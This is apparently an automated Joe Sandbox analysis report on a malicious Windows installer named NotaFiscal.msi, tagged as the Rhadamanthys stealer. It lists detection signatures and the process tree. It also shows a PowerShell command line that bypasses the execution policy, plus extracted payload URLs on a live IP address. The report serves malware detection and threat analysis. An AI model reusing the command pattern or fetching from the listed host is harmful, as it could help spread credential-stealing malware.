Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NotaFiscal.msi

Overview

General Information

Sample Name:NotaFiscal.msi
Analysis ID:803452
MD5:115c30afbf3a6b6f7fd43b25a0d286d5
SHA1:20446917c9f8ad50c1ad4432ea17682fe55ba7f4
SHA256:b25ada06ea01e722ac2b932bac8640c84355b29c8c298799e0ee797d18937524
Tags:msiRhadamanthys
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected MalDoc
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Drops PE files to the windows directory (C:\Windows)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Checks for available system drives (often done to infect USB drives)
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

  • System is w10x64
  • msiexec.exe (PID: 4472 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\NotaFiscal.msi" MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 1396 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 5812 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding DE799B6D65FDD1EFF7D6ADCB97B743B3 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • powershell.exe (PID: 5896 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss846F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi846B.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr846C.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr846D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue." MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
NotaFiscal.msiJoeSecurity_MalDocYara detected MalDocJoe Security
    NotaFiscal.msiJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Windows\Installer\6e7bc0.msiJoeSecurity_MalDocYara detected MalDocJoe Security
        C:\Windows\Installer\6e7bc0.msiJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          SourceRuleDescriptionAuthorStrings
          amsi32_5896.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            No Sigma rule has matched
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: NotaFiscal.msiVirustotal: Detection: 16%Perma Link
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: NotaFiscal.msi, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI8075.tmp.1.dr
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb_ source: NotaFiscal.msi, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr
            Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: c:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

            Networking

            barindex
            Source: Yara matchFile source: NotaFiscal.msi, type: SAMPLE
            Source: Yara matchFile source: C:\Windows\Installer\6e7bc0.msi, type: DROPPED
            Source: unknownTCP traffic detected without corresponding DNS query: 20.125.141.224
            Source: unknownTCP traffic detected without corresponding DNS query: 20.125.141.224
            Source: unknownTCP traffic detected without corresponding DNS query: 20.125.141.224
            Source: powershell.exe, 00000003.00000002.388596354.0000000005690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.125.14
            Source: powershell.exe, 00000003.00000002.388596354.000000000575B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.125.141.224
            Source: powershell.exe, 00000003.00000002.388596354.0000000005690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.125.141.224/pro/
            Source: powershell.exe, 00000003.00000002.388596354.0000000005690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.125.141.224/pro/$ProcN
            Source: powershell.exe, 00000003.00000002.388596354.0000000005690000.00000004.00000800.00020000.00000000.sdmp, NotaFiscal.msi, scr846C.ps1.2.dr, 6e7bc0.msi.1.drString found in binary or memory: http://20.125.141.224/pro/$ProcName
            Source: powershell.exe, 00000003.00000002.388596354.0000000005690000.00000004.00000800.00020000.00000000.sdmp, NotaFiscal.msi, scr846C.ps1.2.dr, 6e7bc0.msi.1.drString found in binary or memory: http://20.125.141.224/pro/$ProcName2
            Source: powershell.exe, 00000003.00000002.388596354.0000000005690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.125.141.224/pro/detoured.dll6C.ps1
            Source: powershell.exe, 00000003.00000002.388596354.00000000056D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.125.141.224/pro/detoured.dllx
            Source: powershell.exe, 00000003.00000002.388596354.0000000005764000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.125.141.2244
            Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: powershell.exe, 00000003.00000002.400029001.0000000006481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0A
            Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0X
            Source: powershell.exe, 00000003.00000002.388596354.000000000555A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000003.00000002.388596354.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
            Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.drString found in binary or memory: http://t2.symcb.com0
            Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.drString found in binary or memory: http://tl.symcb.com/tl.crl0
            Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.drString found in binary or memory: http://tl.symcb.com/tl.crt0
            Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.drString found in binary or memory: http://tl.symcd.com0&
            Source: powershell.exe, 00000003.00000002.388596354.000000000555A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000003.00000002.400029001.0000000006481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000003.00000002.400029001.0000000006481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000003.00000002.400029001.0000000006481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000003.00000002.388596354.000000000555A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000003.00000003.369099618.0000000005E77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000003.00000002.400029001.0000000006481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.drString found in binary or memory: https://www.advancedinstaller.com
            Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.drString found in binary or memory: https://www.thawte.com/cps0/
            Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.drString found in binary or memory: https://www.thawte.com/repository0W
            Source: NotaFiscal.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs NotaFiscal.msi
            Source: NotaFiscal.msiBinary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs NotaFiscal.msi
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI7E7F.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6e7bc0.msiJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04ED76823_2_04ED7682
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04ED76903_2_04ED7690
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04EDAF693_2_04EDAF69
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04EDAF783_2_04EDAF78
            Source: NotaFiscal.msiVirustotal: Detection: 16%
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\NotaFiscal.msi"
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding DE799B6D65FDD1EFF7D6ADCB97B743B3
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss846F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi846B.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr846C.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr846D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding DE799B6D65FDD1EFF7D6ADCB97B743B3Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss846F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi846B.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr846C.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr846D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."Jump to behavior
            Source: NotaFiscal.msiStatic file information: TRID: Microsoft Windows Installer (77509/1) 52.18%
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_01
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\2125.651Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\Public\Desktop\Modulo de Seguran aJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DFEBC4385930605D28.TMPJump to behavior
            Source: classification engineClassification label: mal68.troj.evad.winMSI@7/30@0/1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: NotaFiscal.msiStatic file information: File size 1720832 > 1048576
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: NotaFiscal.msi, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI8075.tmp.1.dr
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb_ source: NotaFiscal.msi, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04EDA9E0 push es; ret 3_2_04EDA9F6
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7E7F.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI80D4.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI822E.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8075.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7FD8.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7E7F.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI80D4.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI822E.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8075.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7FD8.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
